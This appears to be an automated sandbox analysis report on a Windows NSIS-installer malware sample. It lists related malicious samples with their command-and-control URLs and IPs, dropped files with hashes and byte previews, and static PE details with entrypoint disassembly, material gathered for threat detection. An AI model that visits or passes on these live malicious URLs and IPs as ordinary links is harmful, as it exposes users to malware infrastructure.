                                                                      • Excluded IPs from analysis (whitelisted): 40.88.32.150, 23.54.113.53, 52.147.198.201, 104.43.193.48, 20.82.210.154, 23.10.249.26, 23.10.249.43, 104.43.139.144, 20.50.102.62, 52.155.217.156, 20.54.26.129, 168.61.161.212, 52.255.188.83, 13.88.21.125
                                                                      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      91.195.240.94zIZsNOecPuLdGCf.exeGet hashmaliciousBrowse
                                                                      • www.healthcosts.care/bgxa/?CRi=kimwlxIHd7tYTuUrLPZsG/65szqB/37B9DF0+7obNGHtG/Ce06RErlKYXOZnRp/3E3Z+&QZ3=ehux_83hOxJTVf
                                                                      RMwfvA9kZy.exeGet hashmaliciousBrowse
                                                                      • www.blackmantech.fitness/nnmd/?c2Mh-=lO2MoVQT6pNajXZSE73xMyvXdf5GkN1z0aSPUdRzjxlIRnebkzk7wQJ6JLpBUhzg/rZW&tVm4=J690I
                                                                      h8lD4SWL35.exeGet hashmaliciousBrowse
                                                                      • www.explorerthecity.com/nsag/?AjU=nMtIT7UxRyIEAOlaE53kf7KTbdq7isGDN9MTWD/XqSMrXNBDZVXP4jiLBKn/cvoinmSm&njndiL=9rtTFPBhfVt4
                                                                      triage_dropped_file.exeGet hashmaliciousBrowse
                                                                      • www.flatfootedhatting.com/mdi/?2dz=o8eDa&-Z5hP4=DioI88TeqQWmfiiOmWmcuaLincjPCeFxAm3Mf4GBdL3hzcnSr+FxxIMhUvAG057P6VV0
                                                                      OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                                      • www.jonluxe.com/smzu/?sXUlfNy=4jmgUyxqrzKB9R6KY/Kw9NkpGfAQarlAiZC+A6ZDIzrul26D+9SSDQPuld862RkvQb+o&D8cH=9r8tQzN8o24l6vY
                                                                      32ciKQsy2X.exeGet hashmaliciousBrowse
                                                                      • www.cyprusdivingcenters.com/4qdc/?AR-XJ2=GWRfbaKz01PX5Z24EW6v97NylbcBSP0I/uKVXfrPyRhssTOBPKVVwg/7wG9CsgnNb2uF&et-=XPJxZ2SpixNTl6pp
                                                                      purchase order#034.exeGet hashmaliciousBrowse
                                                                      • www.hidennys.com/8ufh/?EzrthRhp=sNj8Sec9GqI0+hqF3zDptdIKoFxwJ6eQMN5NjCYIrvdQEt76PH0isvXP3IEsdJcOyN5p&ojo0f=SzrhU8
                                                                      PS-AVP2-307678.xlsxGet hashmaliciousBrowse
                                                                      • www.explorerthecity.com/nsag/?FN=nMtIT7U0R1IAAepWG53kf7KTbdq7isGDN9UDKAjWuyMqX8tFeFGDunaJCsr5Xe8pyAmRZg==&wDK0HL=OzrL
                                                                      #U0646#U0633#U062e#U0629 #U0628#U0646#U0643 #U0633#U0648#U064a#U0641#U062a 0083212 pdf.exeGet hashmaliciousBrowse
                                                                      • www.hydrabadproperties.com/n7ak/
                                                                      packet426.exeGet hashmaliciousBrowse
                                                                      • thespiritualhealth.com/wp-content/themes/lightweight/img4.php?k=w20a68bys22rt
                                                                      ETD 4.2 INVOICE, PACKING LIST.xlsxGet hashmaliciousBrowse
                                                                      • www.explorerthecity.com/nsag/?drmti4xx=nMtIT7U0R1IAAepWG53kf7KTbdq7isGDN9UDKAjWuyMqX8tFeFGDunaJCsr5Xe8pyAmRZg==&3fo=iJBh
                                                                      Invoice-0898764_pdf.exeGet hashmaliciousBrowse
                                                                      • www.eleriwyn.com/xgxp/?Cjp4a=ftxlnN6p&tXUt=KSW9RKoPc3Kh/CSV7AxGbGPbVlrTLMNWA5H4CU5GSt5Tcl+uSK1dERD9jfC+q3XvMFMA
                                                                      PO_210301.exe.exeGet hashmaliciousBrowse
                                                                      • www.homeownerdefenders.com/kbc/?T8Ud-te=4PX/28v1JVZVbcj+oKk1Amx2xgNaqYiJpFMQS6y6umMteFjOqTMFLhmTrBrbk6jmxMcJ&U48Ho=NtetPLUX-pOH6Vkp
                                                                      RAQ11986.exeGet hashmaliciousBrowse
                                                                      • www.homeownerdefenders.net/iae2/?uZntHjO=eOZAhbUf7hoWTLxHpQenGxn9ynY5QSqXsSeHMExh6aqc7Z+PeCtqk6zVweyDGmkWOS1c&U488k=Hvsdfr6HWtDxzF-
                                                                      DHL Shipment Notification 7465649870,pdf.exeGet hashmaliciousBrowse
                                                                      • www.wesharefiles.com/cna8/?EZA0IN=IiOf2nkSAsttykMZ9H4GkrBT0nSukx2Rz+Cptu2m/KJlDUhOyyQbdEpGgZ+rCh490K/8&DzrLH=VBZHY83XQx6heP
                                                                      P.O-48452689535945.exeGet hashmaliciousBrowse
                                                                      • www.covicio.com/h3qo/?LL04=OddLokl31qshFyWlyQEIcVDu0pAizKjoKxsWslvKSNLFFj/yIE9+GRG/HaxRm8+xLwnE&-ZAtX2=rVIHh
                                                                      Parcel _009887 .exeGet hashmaliciousBrowse
                                                                      • www.travaze.net/csw6/?t8bHuZw=5Csme1iBHNLN+MMVXv0Y+/dYmOMAu5DDsb4nl1t7CK7OkDyEaEwdChfrrdS2Koinfw+E+sdbXw==&2d=llsp
                                                                      NEW ORDER - VOLVO HK HKPO2102-13561,pdf.exeGet hashmaliciousBrowse
                                                                      • www.wesharefiles.com/cna8/?Iv4=XVs8FhyH&J6A8VhS0=IiOf2nkSAsttykMZ9H4GkrBT0nSukx2Rz+Cptu2m/KJlDUhOyyQbdEpGgZ+BdRI9wI38
                                                                      RE PAYMENT REMINDER - SOA - OUTSTANDING (JAN21).EXEGet hashmaliciousBrowse
                                                                      • www.wesharefiles.com/cna8/?BvI=IiOf2nkSAsttykMZ9H4GkrBT0nSukx2Rz+Cptu2m/KJlDUhOyyQbdEpGgZ+BdRI9wI38&J690I=el8Pez2hlLm
                                                                      SK8HSWos1p.rtfGet hashmaliciousBrowse
                                                                      • www.prnttees.com/o8na/?6lhtznA=51OYCRjHpMN3HpclT1eaxLu+bDejj8XPwPDcg4oNcqWkkOhXz69T2J50gX1YIKk3eI3vVg==&rX=VzutZ2

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      www.qcmax.comARBmDNJS7m.exeGet hashmaliciousBrowse
                                                                      • 104.128.125.95
                                                                      www.bedpee.cominvoice bank.xlsxGet hashmaliciousBrowse
                                                                      • 13.248.216.40
                                                                      parking.namesilo.comvbc.exeGet hashmaliciousBrowse
                                                                      • 209.141.38.71
                                                                      Payment Slip.exeGet hashmaliciousBrowse
                                                                      • 192.161.187.200
                                                                      UTcQK0heAfGWTLw.exeGet hashmaliciousBrowse
                                                                      • 64.32.22.102
                                                                      RFQ # 1014397402856.pdf.exeGet hashmaliciousBrowse
                                                                      • 204.188.203.155
                                                                      invoice bank.xlsxGet hashmaliciousBrowse
                                                                      • 198.251.84.92
                                                                      Payment_Advice_REF344266.xlsxGet hashmaliciousBrowse
                                                                      • 198.251.84.92
                                                                      Revised Signed Proforma Invoice 000856453553.exeGet hashmaliciousBrowse
                                                                      • 188.164.131.200
                                                                      ZsA5S2nQAa.exeGet hashmaliciousBrowse
                                                                      • 168.235.88.209
                                                                      New Purchase Order.exeGet hashmaliciousBrowse
                                                                      • 204.188.203.155
                                                                      h8lD4SWL35.exeGet hashmaliciousBrowse
                                                                      • 188.164.131.200
                                                                      d3r3jm1oKY.exeGet hashmaliciousBrowse
                                                                      • 70.39.125.244
                                                                      9311-32400.pdf.exeGet hashmaliciousBrowse
                                                                      • 45.58.190.82
                                                                      Invoice ICO ZRT.xlsxGet hashmaliciousBrowse
                                                                      • 192.161.187.200
                                                                      RFQ MEDICAL EQUIPMENT_PDF.exeGet hashmaliciousBrowse
                                                                      • 209.141.38.71
                                                                      v708469737489630001.exeGet hashmaliciousBrowse
                                                                      • 192.161.187.200
                                                                      SPmG3TLdax.exeGet hashmaliciousBrowse
                                                                      • 204.188.203.155
                                                                      RDAW-180-47D.exeGet hashmaliciousBrowse
                                                                      • 64.32.22.102
                                                                      0HCan2RjnP.exeGet hashmaliciousBrowse
                                                                      • 107.161.23.204
                                                                      1feiNnK6Qd.exeGet hashmaliciousBrowse
                                                                      • 209.141.38.71
                                                                      Yc6FOuQigh.exeGet hashmaliciousBrowse
                                                                      • 198.251.84.92
                                                                      parkingpage.namecheap.comPaymentAdvice.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.218
                                                                      DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                                                      • 198.54.117.215
                                                                      TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.212
                                                                      46578-TR.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.218
                                                                      ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.217
                                                                      1517679127365.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      BL-2010403L.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.218
                                                                      Shinshin Machinery.exe.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.212
                                                                      PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.217
                                                                      INV-210318L.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.212
                                                                      Inquiry.docxGet hashmaliciousBrowse
                                                                      • 198.54.117.218
                                                                      BL Draft copy.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.215
                                                                      Order.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.210
                                                                      PO.1183.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.211
                                                                      TSPO0001978-xlxs.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      evaoRJkeKU.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.210
                                                                      igPVY6UByI.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.216
                                                                      Swift001_jpg.exeGet hashmaliciousBrowse
                                                                      • 198.54.117.218

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      HETZNER-ASDEvbc.exeGet hashmaliciousBrowse
                                                                      • 195.201.179.80
                                                                      vgUgvbLjyI.exeGet hashmaliciousBrowse
                                                                      • 195.201.225.248
                                                                      Rechnung.docGet hashmaliciousBrowse
                                                                      • 46.4.51.158
                                                                      6IGbftBsBg.exeGet hashmaliciousBrowse
                                                                      • 88.99.66.31
                                                                      SecuriteInfo.com.W32.AIDetect.malware2.22480.exeGet hashmaliciousBrowse
                                                                      • 195.201.225.248
                                                                      Revised Invoice No CU 7035.exeGet hashmaliciousBrowse
                                                                      • 78.46.133.81
                                                                      ikoAImKWvI.exeGet hashmaliciousBrowse
                                                                      • 88.99.66.31
                                                                      V7UnYc7CCN.exeGet hashmaliciousBrowse
                                                                      • 88.99.66.31
                                                                      uTQdPoKj0h.exeGet hashmaliciousBrowse
                                                                      • 95.217.123.103
                                                                      uTQdPoKj0h.exeGet hashmaliciousBrowse
                                                                      • 95.217.123.103
                                                                      Updated SOA.xlsxGet hashmaliciousBrowse
                                                                      • 136.243.92.92
                                                                      SecuriteInfo.com.W32.AIDetect.malware1.16239.exeGet hashmaliciousBrowse
                                                                      • 195.201.225.248
                                                                      SecuriteInfo.com.W32.AIDetect.malware1.23167.exeGet hashmaliciousBrowse
                                                                      • 195.201.225.248
                                                                      receipt-xxxx.htmGet hashmaliciousBrowse
                                                                      • 88.99.136.47
                                                                      comprobante de pago bancario.exeGet hashmaliciousBrowse
                                                                      • 168.119.91.111
                                                                      April_2021_Purchase_Order_000000000000000000000000.pdf.exeGet hashmaliciousBrowse
                                                                      • 95.217.195.80
                                                                      PAY-INV-1007.exeGet hashmaliciousBrowse
                                                                      • 95.217.195.80
                                                                      40JHtWiswn.exeGet hashmaliciousBrowse
                                                                      • 195.201.225.248
                                                                      34#U0e15.exeGet hashmaliciousBrowse
                                                                      • 116.203.213.72
                                                                      PO91361.exeGet hashmaliciousBrowse
                                                                      • 135.181.76.226
                                                                      ST-BGPUSUTcQK0heAfGWTLw.exeGet hashmaliciousBrowse
                                                                      • 64.32.22.102
                                                                      RFQ # 1014397402856.pdf.exeGet hashmaliciousBrowse
                                                                      • 204.188.203.155
                                                                      BIOTECHPO960488580.exeGet hashmaliciousBrowse
                                                                      • 205.144.171.210
                                                                      GJK-KAOHSIUNG-2101.xlsxGet hashmaliciousBrowse
                                                                      • 205.144.171.138
                                                                      New Purchase Order.exeGet hashmaliciousBrowse
                                                                      • 204.188.203.155
                                                                      9311-32400.pdf.exeGet hashmaliciousBrowse
                                                                      • 45.58.190.82
                                                                      ssyrNaO6AP.dllGet hashmaliciousBrowse
                                                                      • 70.39.99.196
                                                                      5401628864_AWB_28002_2021-17-03 2.exeGet hashmaliciousBrowse
                                                                      • 67.21.94.15
                                                                      SPmG3TLdax.exeGet hashmaliciousBrowse
                                                                      • 204.188.203.155
                                                                      RDAW-180-47D.exeGet hashmaliciousBrowse
                                                                      • 64.32.22.102
                                                                      Doc_3847468364836483638463,pdf.exeGet hashmaliciousBrowse
                                                                      • 170.178.168.203
                                                                      gV8xdP8bas.exeGet hashmaliciousBrowse
                                                                      • 104.160.174.169
                                                                      DHL.INFORMATION.TRACKING.exeGet hashmaliciousBrowse
                                                                      • 67.21.94.4
                                                                      pVXFB33FzO.exeGet hashmaliciousBrowse
                                                                      • 104.160.174.164
                                                                      ICrLYbQDcRrTPg5.exeGet hashmaliciousBrowse
                                                                      • 67.21.94.4
                                                                      Complaint-Copy-676926603-03092021.xlsGet hashmaliciousBrowse
                                                                      • 205.144.171.49
                                                                      Complaint-Copy-645863057-03092021.xlsGet hashmaliciousBrowse
                                                                      • 205.144.171.49
                                                                      Complaint-Copy-676926603-03092021.xlsGet hashmaliciousBrowse
                                                                      • 205.144.171.49
                                                                      Complaint-Copy-645863057-03092021.xlsGet hashmaliciousBrowse
                                                                      • 205.144.171.49
                                                                      Complaint-Copy-1308127799-03092021.xlsGet hashmaliciousBrowse
                                                                      • 205.144.171.49
                                                                      SEDO-ASDEzIZsNOecPuLdGCf.exeGet hashmaliciousBrowse
                                                                      • 91.195.240.94
                                                                      RMwfvA9kZy.exeGet hashmaliciousBrowse
                                                                      • 91.195.240.94
                                                                      h8lD4SWL35.exeGet hashmaliciousBrowse
                                                                      • 91.195.240.94
                                                                      FIN4.docmGet hashmaliciousBrowse
                                                                      • 91.195.240.13
                                                                      FIN4.docmGet hashmaliciousBrowse
                                                                      • 91.195.240.13
                                                                      FIN4.docmGet hashmaliciousBrowse
                                                                      • 91.195.240.13
                                                                      triage_dropped_file.exeGet hashmaliciousBrowse
                                                                      • 91.195.240.94
                                                                      OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                                      • 91.195.240.94
                                                                      32ciKQsy2X.exeGet hashmaliciousBrowse
                                                                      • 91.195.240.94
                                                                      quLdcfImUL.exeGet hashmaliciousBrowse
                                                                      • 91.195.241.137
                                                                      Swift.exeGet hashmaliciousBrowse
                                                                      • 91.195.241.137
                                                                      MT LIANG SHENG_Ningbo Notice.xlsxGet hashmaliciousBrowse
                                                                      • 91.195.241.137
                                                                      PALERMO PO4215.xlsxGet hashmaliciousBrowse
                                                                      • 91.195.241.137
                                                                      NEW ORDER QUOTATION.xlsxGet hashmaliciousBrowse
                                                                      • 91.195.241.137
                                                                      Payment Copy.exeGet hashmaliciousBrowse
                                                                      • 91.195.240.12
                                                                      purchase order#034.exeGet hashmaliciousBrowse
                                                                      • 91.195.240.94
                                                                      PS-AVP2-307678.xlsxGet hashmaliciousBrowse
                                                                      • 91.195.240.94
                                                                      #U0646#U0633#U062e#U0629 #U0628#U0646#U0643 #U0633#U0648#U064a#U0641#U062a 0083212 pdf.exeGet hashmaliciousBrowse
                                                                      • 91.195.240.94
                                                                      FeDex Shipment Confirmation.exeGet hashmaliciousBrowse
                                                                      • 91.195.241.137
                                                                      FeDex Shipment Confirmation.exeGet hashmaliciousBrowse
                                                                      • 91.195.241.137

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dllQuotation Zhejiang.xlsxGet hashmaliciousBrowse

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Temp\35ab8wlx6zqe82u0
                                                                        Process:C:\Users\user\Desktop\eQLPRPErea.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):164864
                                                                        Entropy (8bit):7.998989332403079
                                                                        Encrypted:true
                                                                        SSDEEP:3072:5Uc2cZX//lia9uzqJ1FPe87cVroSCR58XxrviPv0NOtfptbRlR:5Uc2SXli2LbG87uroXR585UcNKbbR
                                                                        MD5:9A9A459A5A231E0F2520C491C61FA1DA
                                                                        SHA1:7FD4E213B226ABE116437E168F0D27844B983592
                                                                        SHA-256:D0728A76A7BF4D436FAC8890A32E8C96B42CCD660B4E48927EB465E334598B1E
                                                                        SHA-512:F4CA81A0DB7340FB23AA4E21667838B8C88D5F3C84F47B48D77CD5CA5CE296C260F31B26A29187AB3739DD7196372D5FD40B5699B5D7D118E6C8E6328BCAE447
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: =n.....3@.1..*o..%..(..D.../.x.9....u..{..;.enPL!..#..0.6z.d.{j.......,k..Q.hP#.N.`*.F.76.l.....NZ.D....Mj.....c.e.4...j}A.8.G.GY..Z........M.(C........JF.Q..B.S.....F...m.fcF&HK........,.L,~...... ..Er....y`...0. .(`..s.C.'.9.@.Mg..d....v.EN$.R.W...x.6.\U..?m.V....oIf....U9T.6...>.E..x...+<C@mSf....s.v.......5..G.$o..1..]...(....zg.S.X9.\..ZnbsX@D.N..(I..r.....N...T......i....A...[_],.e....u.D...z~...?\..r.......1....}.....$..C.a.#~.n...#`..E~....fw]"..b..q....1.6 5.:N.~.'9.G o........./K=...._+.U..8...4.}...] ...C@.Bv....k9.h'.`E...zkI..:...r.d5.l.....iH8.P..H..2$"..k].^u.x.1........uX...^.....,/.}BHT...73..... ..My.BV^tV.^ $..r.l.:<+<..k...^.6./. .u......2....<..f`nz.6g^.Z......t..Ox.(.iBV`4.+.B.01..)...?..D..>.....~..'.dm....C..S..<...x<...P......`..&5<...>...u.}4.AQ~.._.V.3t5.......x...\._oF....2..............O-.(..H.TQo.....=...w7R.C...{...j7.Fm..[..<..}...3.."..~...]..*.x..9.........M<.......S:.b....'.e/K....q.m<..l.m..At._.
                                                                        C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll
                                                                        Process:C:\Users\user\Desktop\eQLPRPErea.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):5120
                                                                        Entropy (8bit):4.171187189386588
                                                                        Encrypted:false
                                                                        SSDEEP:48:StGht7Wr3QTZj0a6PTh7SKFt5ET9TbOGa4zzBvoAXAdUMQ9Bg6RuqS:jSrATZX6BD5EhTiGXHBgVueax
                                                                        MD5:7023C422B5D2571D6B132378437B1E9E
                                                                        SHA1:1F2C41B1E36DDA6ED420B5F8708AF6457F59A10D
                                                                        SHA-256:2BF1F784B019210A10EEF61E5AF8ABFBB9E02748CF9D6718F4BF6B3F72661779
                                                                        SHA-512:2659574EDE5079F0B522C01E0FD7FCDD4DED74D895650126979980221BA77582C01DEFA76DDDDA42BC73E4C5CC8268D4285DA29D6C438212503B6ED1529C596D
                                                                        Malicious:false
                                                                        Joe Sandbox View:
                                                                        • Filename: Quotation Zhejiang.xlsx, Detection: malicious, Browse
                                                                        Reputation:low
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L....m`...........!......................... ...............................`............@......................... !..P...\".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\qmnajxcs95hz
                                                                        Process:C:\Users\user\Desktop\eQLPRPErea.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6661
                                                                        Entropy (8bit):7.96450606123374
                                                                        Encrypted:false
                                                                        SSDEEP:192:mKamyP2+KBf3IfmRxQpCkEAEYfu6tOy7UUwv9:m91i9YsxnkBuN2Q
                                                                        MD5:56D7E12AB211686BE29BD8E00F4A46DA
                                                                        SHA1:AD4A22657ADE632D181D7C523F3203E76695B546
                                                                        SHA-256:0F8A856FF0A1A63EA5BBF83BF33C4B61B4444512A53FB43A8811705042DB3A39
                                                                        SHA-512:08C01CD9B8F8E5BC5AEA8E031DBA01DEABC85499AAFC3E9228B524C7A5AD2668280B4EBA535A79BAE4F57FF21D460998C0D6D13ADDF24F8D96926C382E8B6960
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: ....&...:..W..i.....!...'K.Sx..:A8!<...;....4.....%.|...........v\...`Y~..NQ.v7..qQ# y..E\......s2...|...;..~.w%....|=...k....;{bL.._XQ9x..*H....4Mm..Ze..K....e.....1h....../n... ...h.R{l..`o.@....C.....W~A..CD~.d..*.67.R....[w..I'.....i...<A..Z..yr...?:/.S/...h....-..:AU.2.U.;..al....W70.bgu.?X......[..u.kRM..OH.i(...zX(+?..D]y....z;...}......a..".....>....."!..@.k\..P_.0q..R3O..*..'NQ..ST.5t....t..L...a.....2.o.{_5KJZm....(..$.{.....h[...Z.:'.W~....!..+..[..k....m..*.z..........X+.Ob;k..(.W?>..Y..GF.v..6.&.....M.(jsU..X.u.y....ih.O..4t...M1.:.tu6IB..!S\.!Mt.<xy:...w6...8.E....|...5....a./..x..i.|=r....@..........l.....-.......2..L..KT.............(..".,m.S..*#..#.`o.@.....V...cP..O.d.Uq.a...v.......PY.Aur.^...M\...y3.:.d.3....7^..~..8....S..I..=6}......5f..4a..6..O......=.....ur.~.;.'Vp.....4...p3.#n4.$et...=c..?...<.V~..Ga~...1|=.. t.@.....Z.gt.4........ Z.+.4u...&...K....^).8.Mh...D..V$...m.2]*....,.....m....Y..ND..~..H....../.#.

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit):7.915089020780882
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:eQLPRPErea.exe
                                                                        File size:206065
                                                                        MD5:2c64897aa30694cc768f5ea375157932
                                                                        SHA1:c897f37780a5237d5c330bcf2668745201b38ff5
                                                                        SHA256:18d465a5867ee069480bb9be8eb259be41cc008e487b7b6a3cad14e3559963a9
                                                                        SHA512:6c1cfc20e4aaf0ee78b60a80c5ff559cb71ac31b62f2e9068638046cd3fec5fe078f37de85c50c65090b82d784931e07bdf692a597b14133eae36ad143b3fea2
                                                                        SSDEEP:3072:NeYBCwqDxkJ0KBUc2cZX//lia9uzqJ1FPe87cVroSCR58XxrviPv0NOtfptbRlP4:NDIKUc2SXli2LbG87uroXR585UcNKbbQ
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lJ...$...$...$./.{...$...%.9.$.".y...$.......$.f."...$.Rich..$.........................PE..L.....8E.................\.........

                                                                        File Icon

                                                                        Icon Hash:00828e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x403166
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x4538CD1D [Fri Oct 20 13:20:29 2006 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        sub esp, 0000017Ch
                                                                        push ebx
                                                                        push ebp
                                                                        push esi
                                                                        xor esi, esi
                                                                        push edi
                                                                        mov dword ptr [esp+18h], esi
                                                                        mov ebp, 00409240h
                                                                        mov byte ptr [esp+10h], 00000020h
                                                                        call dword ptr [00407030h]
                                                                        push esi
                                                                        call dword ptr [00407270h]
                                                                        mov dword ptr [0042F4D0h], eax
                                                                        push esi
                                                                        lea eax, dword ptr [esp+30h]
                                                                        push 00000160h
                                                                        push eax
                                                                        push esi
                                                                        push 00429860h
                                                                        call dword ptr [00407158h]
                                                                        push 00409230h
                                                                        push 0042EC20h
                                                                        call 00007FC0E8845788h
                                                                        mov ebx, 00436400h
                                                                        push ebx
                                                                        push 00000400h
                                                                        call dword ptr [004070B4h]
                                                                        call 00007FC0E8842EC9h
                                                                        test eax, eax
                                                                        jne 00007FC0E8842F86h
                                                                        push 000003FBh
                                                                        push ebx
                                                                        call dword ptr [004070B0h]
                                                                        push 00409228h
                                                                        push ebx
                                                                        call 00007FC0E8845773h
                                                                        call 00007FC0E8842EA9h
                                                                        test eax, eax
                                                                        je 00007FC0E88430A2h
                                                                        mov edi, 00435000h
                                                                        push edi
                                                                        call dword ptr [00407140h]
                                                                        call dword ptr [004070ACh]
                                                                        push eax
                                                                        push edi
                                                                        call 00007FC0E8845731h
                                                                        push 00000000h
                                                                        call dword ptr [00407108h]
                                                                        cmp byte ptr [00435000h], 00000022h
                                                                        mov dword ptr [0042F420h], eax
                                                                        mov eax, edi
                                                                        jne 00007FC0E8842F6Ch
                                                                        mov byte ptr [esp+10h], 00000022h
                                                                        mov eax, 00000001h

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74500xb4.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x567.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x5bfe0x5c00False0.677097486413data6.48704517882IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x70000x11fe0x1200False0.465494791667data5.27785481266IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x90000x264d40x400False0.6669921875data5.22478733059IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
